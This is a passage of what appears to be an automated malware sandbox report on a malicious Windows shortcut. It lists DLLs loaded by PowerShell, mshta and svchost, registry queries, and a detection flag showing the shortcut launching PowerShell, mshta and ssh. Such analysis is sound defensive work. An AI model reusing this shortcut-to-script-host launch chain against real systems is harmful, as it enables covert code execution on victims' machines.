Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uianimation.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: IOnqEVA4Dz.lnkLNK file: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
